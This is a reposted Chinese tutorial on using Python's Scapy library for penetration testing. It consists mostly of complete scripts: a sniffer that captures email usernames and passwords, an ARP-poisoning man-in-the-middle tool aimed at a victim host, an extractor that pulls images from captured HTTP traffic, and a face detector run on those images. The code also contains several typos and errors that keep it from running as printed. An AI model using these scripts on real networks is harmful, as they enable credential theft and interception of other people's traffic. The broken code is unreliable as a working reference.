• 技术文章 >后端开发 >Python教程

    Python渗透测试入门之Scapy库如何使用

    WBOYWBOY2023-04-19 12:37:05转载92

    Scapy 是一个用来解析底层网络数据包的Python模块和交互式程序,该程序对底层包处理进行了抽象打包,使得对网络数据包的处理非常简便。该类库可以在在网络安全领域有非常广泛用例,可用于漏洞利用开发、数据泄露、网络监听、入侵检测和流量的分析捕获的。Scapy与数据可视化和报告生成集成,可以方便展示起结果和数据。

    窃取邮箱身份凭证

    Scapy提供了一个名字简明扼要的接口函数sniff,它的定义是这样的:

    sniff(filter = " ", iface = "any", prn = function, count = N)

    filter参数允许你指定一个Berkeley数据包过滤器(Berkeley Packet Filter,BPF),用于过滤Scapy嗅探到的数据包,也可以将此参数留空,表示要嗅探所有的数据包。

    iface参数用于指定嗅探器要嗅探的网卡,如果不设置的话,默认会嗅探所有网卡。prn参数用于指定一个回调函数,每当遇到符合过滤条件的数据包时,嗅探器就会将该数据包传给这个回调函数,这是该函数接受的唯一参数。count参数可以用来指定你想嗅探多少包,如果留空的话,Scapy就会一直嗅探下去。

    mail_sniffer.py:

    from scapy.all import sniff
    
    def packet_callback(packet):
        print(packet.show())
    
    def main():
        sniff(pro=packet_callback, count=1)
    
    if __name__ == '__main__':
        main()

    在这个简单的嗅探器中,它只会嗅探邮箱协议相关的命令。

    接下来我们将添加过滤器和回调函数代码,有针对性地捕获和邮箱账号认证相关的数据。

    首先,我们将设置一个包过滤器,确保嗅探器只展示我们感兴趣的包。我们会使用BPF语法(也被称为Wireshark风格的语法)来编写过滤器。你可能会在tcpdump、Wireshark等工具中用到这种语法。先来讲一下基本的BPF语法。在BPF语法中,可以使用三种类型的信息:描述词(比如一个具体的主机地址、网卡名称或端口号)、数据流方向和通信协议,如图所示。你可以根据自己想找的数据,自由地添加或省略某个类型、方向或协议。

    我们先写一个BPF:

    from scapy.all import sniff, TCP, IP
    
    #the packet callback
    def packet_callback(packet):
        if packet[TCP].payload:
            mypacket = str(packet[TCP].paylaod)
            if 'user' in mypacket.lower() or 'pass' in mypacket.lower():
                print(f"[*] Destination: {packet[IP].dst}")
                print(f"[*] {str(packet[TCP].payload)}")
    
    
    def main():
        #fire up the sniffer
        sniff(filter='tcp port 110 or tcp port 25 or tcp port 143',prn=packet_callback, store=0)
    #监听邮件协议常用端口
    #新参数store,把它设为0以后,Scapy就不会将任何数据包保留在内存里
    
    if __name__ == '__main__':
        main()

    ARP投毒攻击

    逻辑:欺骗目标设备,使其相信我们是它的网关;然后欺骗网关,告诉它要发给目标设备的所有流量必须交给我们转发。网络上的每一台设备,都维护着一段ARP缓存,里面记录着最近一段时间本地网络上的MAC地址和IP地址的对应关系。为了实现这一攻击,我们会往这些ARP缓存中投毒,即在缓存中插入我们编造的记录。

    注意实验的目标机为mac

    arper.py:

    from multiprocessing import Process
    from scapy.all import (ARP, Ether, conf, get_if_hwaddr, send, sniff, sndrcv, srp, wrpcap)
    import os
    import sys
    import time
    
    def get_mac(targetip):
        packet = Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(op="who-has", pdst=targetip)
        resp, _= srp(packet, timeout=2, retry=10, verbose=False)
        for _, r in resp:
            return r[Ether].src
        return None
        
    class Arper:
        def __init__(self, victim, gateway, interface='en0'):
            self.victim = victim
            self.victimmac = get_mac(victim)
            self.gateway = gateway
            self.gatewaymac = get_mac(gateway)
            self.interface = interface
            conf.iface = interface
            conf.verb = 0
    
            print(f'Initialized {interface}:')
            print(f'Gateway ({gateway}) is at {self.gateway}')
            print(f'Victim ({victim}) is at {self.gatewaymac}')
            print('_'*30)
        
        def run(self):
            self.poison_thread = Process(target=self.poison)
            self.poison_thread.start()
    
            self.sniff_thread = Process(target=self.sniff)
            self.sniff_thread.start()
    
        def poison(self):
            poison_victim = ARP()
            poison_victim.op = 2
            poison_victim.psrc = self.gateway
            poison_victim.pdst = self.victim
            poison_victim.hwdst = self.victimmac
            print(f'ip src: {poison_victim.psrc}')
            print(f'ip dst: {poison_victim.pdst}')
            print(f'mac dst: {poison_victim.hwdst}')
            print(f'mac src: {poison_victim.hwsrc}')
            print(poison_victim.summary())
            print('_'*30)
            poison_gateway = ARP()
            poison_gateway.op = 2
            poison_gateway.psrc = self,victim 
            poison_gateway.pdst = self.gateway
            poison_gateway.hwdst = self.gatewaymac
    
            print(f'ip src: {poison_gateway.psrc}')
            print(f'ip dst: {poison_gateway.pdst}')
            print(f'mac dst: {poison_gateway.hwdst}')
            print(f'mac_src: {poison_gateway.hwsrc}')
            print(poison_gateway.summary())
            print('_'*30)
            print(f'Beginning the ARP poison. [CTRL -C to stop]')
            while True:
                sys.stdout.write('.')
                sys.stdout.flush()
                try:
                    send(poison_victim)
                    send(poison_gateway)
                except KeyboardInterrupt:
                    self.restore()
                    sys.exit()
                else:
                    time.sleep(2)
    
    
        def sniff(self, count=200):
            time.sleep(5)
            print(f'Sniffing {count} packets')
            bpf_filter = "ip host %s" % victim
            packets = sniff(count=count, filter=bpf_filter, ifcae=self.interface)
            wrpcap('arper.pcap', packets)
            print('Got the packets')
            self.restore()
            self.poison_thread.terminate()
            print('Finished')
    
        def restore(self):
            print('Restoring ARP tables...')
            send(ARP(
                op=2,
                psrc=self.gateway,
                hwsrc=self.gatewaymac,
                pdst=self.victim,
                hwdst='ff:ff:ff:ff:ff:ff'),
                count=5)
            send(ARP(
                op=2,
                psrc=self.victim,
                hwsrc=self.victimmac,
                pdst=self.gateway,
                hwdst='ff:ff:ff:ff:ff:ff'),
                count=5)
                    
    
    if __name__ == '__main__':
        (victim, gateway, interface) = (sys.argv[1], sys.argv[2], sys.argv[3])
        myarp = Arper(victim, gateway, interface)
        myarp.run()

    pcap文件处理

    recapper.py:

    from scapy.all import TCP, rdpcap
    import collections
    import os
    import re
    import sys
    import zlib
    
    OUTDIR = '/root/Desktop/pictures'
    PCAPS = '/root/Downloads'
    
    Response = collections.namedtuple('Response', ['header','payload'])
    
    def get_header(payload):
        try:
            header_raw = payload[:payload.index(b'\r\n\r\n')+2]
        except ValueError:
            sys.stdout.write('_')
            sys.stdout.flush()
            return None
        
        header = dict(re.findall(r'?P<name>.*?): (?P<value>.*?)\r\n', header_raw.decode()))
        if 'Content-Type' not in header:
            return None
        return header
    
    def extract_content(Response, content_name='image'):
        content, content_type = None, None
        if content_name in Response.header['Content-Type']:
            content_type = Response.header['Content-Type'].split('/')[1]
            content = Response.payload[Response.payload.index(b'\r\n\r\n')+4:]
    
            if 'Content-Encoding' in Response.header:
                if Response.header['Content-Encoding'] == "gzip":
                    content = zlib.decompress(Response.payload, zlib.MAX_wbits | 32)
                elif Response.header['Content-Encoding'] == "deflate":
                    content = zlib.decompress(Response.payload) 
        
        return content, content_type
    
    class Recapper:
        def __init__(self, fname):
            pcap = rdpcap(fname)
            self.session = pcap.session()
            self.responses = list()
    
        def get_responses(self):
            for session in self.session:
                payload = b''
                for packet in self.session[session]:
                    try:
                        if packet[TCP].dport == 80 or packet[TCP].sport == 80:
                            payload += bytes(packet[TCP].payload)
                    except IndexError:
                        sys.stdout.write('x')
                        sys.stdout.flush()
            
                if payload:
                    header = get_header(payload)
                    if header is None:
                        continue
                self.responses.append(Response(header=header, payload=payload))
        def write(self, content_name):
            for i, response in enumerate(self.responses):
                content, content_type = extract_content(response, content_name)
                if content and content_type:
                    fname = os.path.join(OUTDIR, f'ex_{i}.{content_type}')
                    print(f'Writing {fname}')
                    with open(fname, 'wb') as f:
                        f.write(content)
    
    if __name__ == '__main__':
        pfile = os.path.join(PCAPS, 'pcap.pcap')
        recapper = Recapper(pfile)
        recapper.get_responses()
        recapper.write('image')

    如果我们得到了一张图片,那么我们就要对这张图片进行分析,检查每张图片来确认里面是否存在人脸。对每张含有人脸的图片,我们会在人脸周围画一个方框,然后另存为一张新图片。

    detector.py:

    import cv2
    import os
    
    ROOT = '/root/Desktop/pictures'
    FACES = '/root/Desktop/faces'
    TRAIN = '/root/Desktop/training'
    
    def detect(srcdir=ROOT, tgtdir=FACES, train_dir=TRAIN):
        for fname in os.listdir(srcdir):
            if not fname.upper().endswith('.JPG'):
                continue
            fullname = os.path.join(srcdir, fname)
    
            newname = os.path.join(tgtdir, fname)
            img = cv2.imread(fullname)
            if img is None:
                continue
    
            gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
            training = os.path.join(train_dir, 'haarcascade_frontalface_alt.xml')
            cascade = cv2.CascadeClassifier(training)
            rects = cascade.detectMultiScale(gray, 1.3,5)
            try:
                if rects.any():
                    print('Got a face')
                    rects[:, 2:] += rects[:, :2]
            except AttributeError:
                print(f'No faces fount in {fname}')
                continue
    
            # highlight the faces in the image
            for x1, y1, x2, y2 in rects:
                cv2.rectangle(img, (x1, y1), (x2, y2), (127, 255, 0), 2)
            cv2.imwrite(newname, img)
    
    if name == '__main__':
        detect()

    以上就是Python渗透测试入门之Scapy库如何使用的详细内容,更多请关注php中文网其它相关文章!

    声明:本文转载于:亿速云,如有侵犯,请联系admin@php.cn删除
    专题推荐:Python scapy
    上一篇:Python代码集pathlib应用之如何获取指定目录下的所有文件 下一篇:自己动手写 PHP MVC 框架(40节精讲/巨细/新人进阶必看)

    相关文章推荐

    • 如何使用Python Asyncio实现网站状态检查• Python中的生成器、迭代器、动态新增属性和方法详解• 如何用Python批量删除或移动指定图像?• 如何使用Python的pathlib模块处理文件路径?• 使用Python实现一个简单的四则运算解释器
    1/1

    PHP中文网